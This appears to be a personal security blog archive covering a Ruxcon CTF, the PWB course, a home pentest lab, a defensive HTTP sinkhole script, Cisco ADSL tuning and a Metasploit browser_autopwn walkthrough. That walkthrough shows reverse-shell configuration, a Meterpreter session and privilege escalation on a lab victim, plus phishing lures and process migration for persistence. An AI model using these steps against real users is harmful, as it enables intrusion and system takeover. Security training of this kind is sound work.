ruxcon 2011

Australian security conference RUXCON took place in Melbourne over the weekend. The con was good, and the drive down took about 6-7 hours, which wasn't so bad. Friday night involved a lot of drinking, while Saturday night was drinking and the CTF (see below).

Unfortunately I saw no talks this year since I spent most of the time participating in the CTF (capture the flag) contest as part of a two-man team called 'White & Nerdy', which took 2nd place in the end. Not a bad result for our first CTF competition. I'll probably fly over to Kiwicon next year to participate in their CTF, as I talked to a couple of people at Ruxcon who had nothing but good things to say about it.

The CTF had a few categories (network, web app, unix, reversing), with each level yielding a token upon completion. The UNIX levels were the most fun, as people kept dropping the databases or generally breaking the web app levels, making them almost impossible to compete on, and I'm not sure I even saw the network levels running.

Additionally, the unix levels will be available at http://www.exploit-exercises.com soon!

Penetration Testing with Backtrack

Two months ago or so I decided to take Offensive Security's 'Penetration Testing with Backtrack' course with some friends from work. The course itself is good, and a lot of study on the topics covered in the lab materials is expected. The Offsec guys give you a good starting point, but you will need to research quite a lot on your own, which the lab guide does not really help with. Be prepared to buy a few other books and spend a lot of time reading Wikipedia and so forth. Be prepared to put in 5-6 hours a night and spend most of your weekends glued to a computer.

I bought the 60-day pack of lab time, but was done with the labs within 30 days. I spent the next 30 days taking my time writing the report, making sure everything was up to par in case I was borderline on the exam. Having the remaining few days also allowed me to go back into the labs and get any screenshots that were missing.

Once my lab time was up, I booked the exam for a week later, then began to prepare, prepare, prepare. I probably over-prepared, one would say. Once the exam started everything pretty much fell into place, to the point where I had achieved the pass mark 2 hours in. There are multiple hosts in the exam network, most of which you will never have seen before. Doing some of the extra credit work from the course will give you a good understanding of what you need for the exam.

I made good use of my Metasploit skills during the labs, however there are limits to what you can actually use Metasploit for in the exam. When the time comes for your exam to start, you will receive an outline for the exam which also covers Metasploit usage. Most of my Metasploit usage came on the note-taking side of the tool: keeping track of which hosts I had completed, using the credentials stored in the db, etc. Also, the auxiliary modules make enumeration that much easier; I don't know why anyone uses anything else.

Setting up a penetration testing lab

Over the next few months I plan on completing the Offensive Security 'Penetration Testing with Backtrack' course in my spare time. They give you access to labs via VPN, but I figure it can't hurt to have a lab set up as a fallback or for when my lab time runs out. Over the last few days I've spent some time setting up a lab. What I used was a PC with the specs below:

- Intel Q6600 CPU
- 8GB RAM
- 1TB HDD
- VMware ESXi

Once that was all complete I setup VMs for the following:

- Metasploitable
- pWnOS
- UltimateLAMP
- Windows 2000 Server SP4
- Windows 2008 Server Enterprise R2 x64
- Windows 2008 Server Enterprise R2 x64 SP1
- Windows 2003 Server Enterprise
- Windows 2003 Server Enterprise SP1
- Windows 2003 Server Enterprise SP2 (with MSSQL 2008)
- Windows XP Pro
- Windows XP Pro SP1
- Windows XP Pro SP2
- Windows XP Pro SP3

Metasploitable is the Ubuntu image released by Metasploit/Rapid7. It runs a few services (Apache, distcc, MySQL, SSH, etc.), some of which are exploitable and others which aren't. The plan will be to install vulnerable versions of ProFTPD and Samba.

UltimateLAMP runs older, vulnerable versions of a few different applications, including Drupal, Joomla, phpMyAdmin, SugarCRM, Zen Cart and osCommerce.

This gives me a fairly broad range where I should be able to cover most things that pop up. Additionally I'll have to install other popular enterprise apps (SharePoint, Lotus?) to try and cover everything off. Of course on the attack side I'll have a VM set up running BackTrack 5, since that's what they recommend for the PWB labs/training.

MalNET v0.1

For the past few years I have been interested in incident response and IDS, and one thing I kept asking was 'how can I make this easier?'. Eventually this brought me to what many people know as darknets. A darknet is a range of public IP address space with no live hosts. Since nothing legitimate lives there, any traffic that arrives is unsolicited by definition: scans, worm propagation, backscatter and so on. Unfortunately a plain darknet isn't useful for much beyond gathering statistics and building pie charts: it tells you that something probed you, not what it wanted.

This brings me to what I am now calling 'MalNET'. To help track what malware attempts to download over HTTP, I came up with a (very) work-in-progress program written in Python. MalNET is a low-interaction HTTP server that answers every request with '200 OK' and nothing else. When a sample tries to retrieve http://bad.malwaredomain.com/som/bad/file.exe, MalNET basically says 'yep, OK, here it is' and then does nothing. To make this work you need a blackhole (sinkhole) DNS setup in your environment, such as the one on offer from malwaredomains.com, so that known-bad domains resolve to the MalNET host. Once that traffic is redirected to the MalNET host, you can see exactly what the malware is trying to download, and from which internal machine, rather than just a count of hits.

You can check out what I've made so far over at my new GitHub repository with the command:

git clone git://github.com/brainiac3/malnet.git
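To make the MalNET idea concrete, here is an added example of such a low-interaction sinkhole, written for this post and not taken from the malnet repository. It answers every method on every path with 200 OK and an empty body, and writes one JSON line per request (source IP, Host, path, User-Agent, a hex prefix of any POST body) so the URLs the malware asked for can be grepped afterwards. The record format, the 4 KB body cap and the port handling are choices made here, not features of MalNET.

```python
"""Low-interaction HTTP sinkhole in the spirit of MalNET.

Added example for this post; it is not the code in the malnet repository.
Every method on every path is answered with '200 OK' and an empty body, and
each request is written to stdout as one JSON line so the host, path,
User-Agent and any POST body the malware sent can be searched later.
"""
import json
import sys
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

MAX_BODY = 4096  # bytes of request body to retain; C2 check-ins are small


def summarise_request(method, path, headers, client_ip, body=b"", now=None):
    """Build the log record for one request.

    Kept free of socket handling so it can be tested offline. `headers` is any
    mapping supporting .get(); the handler passes its (case-insensitive)
    email.message.Message object.
    """
    host = headers.get("Host", "")
    stamp = (now or datetime.now(timezone.utc)).isoformat()
    return {
        "ts": stamp,
        "src": client_ip,
        "method": method,
        "host": host,
        "path": path,
        # Reconstruct the URL the malware thought it was fetching.
        "url": f"http://{host}{path}" if host else path,
        "user_agent": headers.get("User-Agent", ""),
        "body_len": len(body),
        # Hex so a binary beacon cannot corrupt the log file or terminal.
        "body_prefix": body[:MAX_BODY].hex(),
    }


class SinkholeHandler(BaseHTTPRequestHandler):
    """Answers everything with 200 OK and logs it; never serves real content."""

    def _sink(self):
        try:
            declared = int(self.headers.get("Content-Length") or 0)
        except ValueError:
            declared = 0
        body = self.rfile.read(min(declared, MAX_BODY)) if declared > 0 else b""
        record = summarise_request(
            self.command, self.path, self.headers, self.client_address[0], body
        )
        record["declared_length"] = declared
        sys.stdout.write(json.dumps(record) + "\n")
        sys.stdout.flush()
        # Default protocol is HTTP/1.0, so the connection closes after this
        # response and any unread body bytes are simply dropped.
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", "0")
        self.end_headers()

    # Downloaders use GET, check-ins tend to use POST; cover the rest as well.
    do_GET = do_POST = do_HEAD = do_PUT = do_OPTIONS = _sink

    def log_message(self, *args):
        """Suppress the default access log; the JSON line above replaces it."""


def serve(port):
    """Listen on all interfaces. Binding port 80 needs root (or a redirect)."""
    ThreadingHTTPServer(("0.0.0.0", port), SinkholeHandler).serve_forever()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 80)
```

Point your sinkhole DNS zone at the host running this, then tail the JSON output: the "src" field tells you which internal machine is infected and "url" tells you what it wanted. Two caveats worth knowing: an empty 200 body will make some downloaders retry in a loop (which is itself a useful signal), and anything that validates what it fetched will simply fail and move on, so you see the attempt, not the payload.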

browser exploitation with metasploit

After talking with a few people who have done the SANS SEC560 (GPEN) course, and having challenged the exam myself, one thing I felt was missing from its Metasploit coverage was the browser exploitation features. With pentesting and exploitation in general having focused on client-side attacks for a while now, I think the course could benefit from covering something like this. First you'll need to start up Metasploit and load the server/browser_autopwn module:

       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 209 payloads - 23 encoders - 8 nops
       =[ svn r9403 updated 3 days ago (2010.06.03)

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

From here, the only option we need to change to get basic functionality working is LHOST, the address the victim's browser connects back to, so it must be reachable from the client network. Unless you want to type out the long random URIPATH, you will probably want to set that as well. Once those options are set, we run the exploit:

msf auxiliary(browser_autopwn) > set URIPATH testing
URIPATH => testing
msf auxiliary(browser_autopwn) > set LHOST 192.168.0.22
LHOST => 192.168.0.22
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.0.22...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/90Yiozy7u9n
[*]  Local IP: http://192.168.0.22:8080/90Yiozy7u9n
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/xGIjmqty
[*]  Local IP: http://192.168.0.22:8080/xGIjmqty
[*] Server started.

<- cut ->

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.22:3333
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.22:6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:8080/testing
[*]  Local IP: http://192.168.0.22:8080/testing
[*] Server started.

Now on the client we browse to the URL listed above as 'Local IP', in this case http://192.168.0.22:8080/testing. Back in the Metasploit console you will see the module fingerprint the browser via JavaScript, pick the matching exploits and, if one lands, open a session:

[*] Request '/testing' from 192.168.0.5:64865
[*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865
[*] JavaScript Report: Windows:Vista:undefined:en-us:x86:MSIE:7.0:
[*] Responding with exploits
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.0.5:64866...
[*] Sending stage (748032 bytes) to 192.168.0.5
[*] Meterpreter session 1 opened (192.168.0.22:3333 -> 192.168.0.5:64867) at Sun Jun 06 12:25:01 +1000 2010

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type         Information                   Connection
  --  ----         -----------                   ----------
  1   meterpreter  vistavm\testadmin @ VISTAVM  192.168.0.22:3333 -> 192.168.0.5:64867

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > use priv
Loading extension priv...success.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > idletime
User has been idle for: 2 mins 46 secs
meterpreter >

Now, how would you go about getting clients to visit this in a pentest? An organisation-wide phishing email is probably the easiest way, provided it is within the agreed scope. Also, if you start msfconsole as root you can set SRVPORT to 80 (binding a port below 1024 requires root), provided nothing else is listening on it; a link without a port number looks far less suspicious to the recipient.

You will also want to migrate to a more stable process within Meterpreter in case the user closes their browser, since the session dies with the exploited process. Under Meterpreter use 'ps' to find long-running processes (for example winlogon or lsass once you have SYSTEM) and run 'migrate <pid>' so your session stays connected.
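The console output above shows the other side of this: before any exploit is sent, the module's JavaScript reports the client back in a base64 sessid parameter, which the console prints as the "JavaScript Report" line. That same parameter lands in proxy and web server logs, so a defender can recover exactly what each victim browser reported. The following is an added example for this post, not Metasploit code: it pulls sessid values out of Apache-style access log lines (the sample lines are constructed, reusing the sessid from the console output above) and decodes them. The field names are inferred from the decoded value Windows:Vista:undefined:en-us:x86:MSIE:7.0: and are an assumption, not the module's own names.

```python
"""Decode browser_autopwn client fingerprints from web or proxy logs.

Added example for this post, not part of Metasploit. The module's JavaScript
reports the client back in a base64 `sessid` query parameter; the same
parameter appears in proxy/web server logs, so the victim's reported OS and
browser can be recovered after the fact.
"""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Assumed field order, inferred from the decoded value shown in the console
# output ("Windows:Vista:undefined:en-us:x86:MSIE:7.0:").
FIELDS = ("os_name", "os_flavor", "os_sp", "os_lang", "arch", "ua_name", "ua_version")

# Request line as quoted in Apache/squid-style logs: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')

# Constructed sample log lines in Apache combined format (not a real capture).
SAMPLE_LOG = [
    '192.168.0.5 - - [06/Jun/2010:12:24:58 +1000] "GET /testing HTTP/1.1" 200 1452 "-" '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"',
    '192.168.0.5 - - [06/Jun/2010:12:24:59 +1000] "GET /testing?sessid='
    'V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d HTTP/1.1" 200 3120 "-" '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"',
    '192.168.0.9 - - [06/Jun/2010:12:30:11 +1000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"curl/7.19.7"',
]


def decode_sessid(value):
    """Decode one sessid value into a fingerprint dict, or None if it is not one.

    Strict base64 decoding plus an ASCII check rejects ordinary session cookies
    that happen to share the parameter name.
    """
    try:
        raw = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    parts = raw.split(":")
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def fingerprints_from_log(lines):
    """Return [(client_ip, fingerprint), ...] for every line carrying a sessid."""
    found = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs already percent-decodes, so "%3d%3d" becomes "==".
        query = parse_qs(urlsplit(match.group("url")).query)
        for sid in query.get("sessid", []):
            fingerprint = decode_sessid(sid)
            if fingerprint:
                found.append((line.split(" ", 1)[0], fingerprint))
    return found


if __name__ == "__main__":
    for ip, fp in fingerprints_from_log(SAMPLE_LOG):
        print(f"{ip}: {fp['os_name']} {fp['os_flavor']} {fp['arch']} "
              f"{fp['ua_name']} {fp['ua_version']}")
```

The detection signature is the pair of requests: a hit on some URI, followed within a second or two by the same URI with a sessid parameter whose decoded value is a colon-separated OS/browser string. Run this over a day of proxy logs and any match is worth a look, whether it came from your own pentest or someone else's.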

GPEN passed

The goal for the next year is to pass the GIAC GSE (GIAC Security Expert), probably by visiting Vegas (again!) next year. The GSE has a few prerequisites in the form of GCIH, GCIA, GSEC and 2 'electives' (other GIAC exams). Since I passed the GPEN exam, which will count as an elective, I need to focus on getting the 3 cores done, which will probably be GCIH first, then GSEC and GCIA.

As all this is self-funded, I'll likely just be reading books on the various topics rather than the actual GIAC material, but we'll see how that pans out.

Packet Life Community Lab

Thinking of doing a specific Cisco certification (CC[NA|NP|IP|IE])? Then you might be interested in the Community Lab provided by Packet Life.

The 'Community Lab' is divided into 2 blocks with the same equipment. You can book one block or both, free of charge. Bookings currently run well into March, so it might be a while before you can get access.

Donations are encouraged, but not required in order to get access. Definitely an option if you can't afford the lab prices offered by the various vendors and want to get some lab time.

ADSL issues

I recently changed ISPs to a slightly cheaper plan with more quota (about 40 GB) per month than my previous provider gave me. Along with this I moved to the 8 Mb DSL plan, whereas previously I was on 1.5 Mb. Once you start getting higher speeds, a lot of other factors come into how stable your connection is. Before I made any changes, my atm0/0/0 interface was looking like:

Speed (kbps): 7300
Noise Margin: 6.0 dB

A noise margin of 6.0 dB turns out to be about the bare minimum you want, as it is the borderline between a stable connection and the connection from hell. As I had been having connection issues lately, I did some googling and on a few sites came across some undocumented Cisco commands, one of which is "service internal". It unlocks hidden options that are unsupported and not in the normal documentation, so treat anything it exposes with care. Normally on an ATM interface you will see something like:

adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
lom Loss Of Margin watch counter for line retrain
operating-mode auto or specific ADSL mode

After enabling service internal in config mode:
adsl-gw(config)#service internal
adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
gain-setting ADSL programmable gain setting
lom Loss Of Margin watch counter for line retrain
max-tone-bits set maximum bits per tone limit
noise-margin set noise margin offset
operating-mode auto or specific ADSL mode
power-cutback Noise Threshold for Power CutBack

Voila. The setting I wanted to play with was noise-margin. It takes an offset between -3 and 3; a higher offset makes the modem demand more SNR margin when it trains, which gives a more stable line at the cost of sync speed. After setting "dsl noise-margin 2" my DSL stats now say:

Noise Margin: 7.5 dB
Speed (kbps): 6592

The noise margin now sits between 7.5 and 9 dB, which is comfortable. The other option is increasing the offset to 3, but I would expect to sync at around 6200 kbps once that's done.
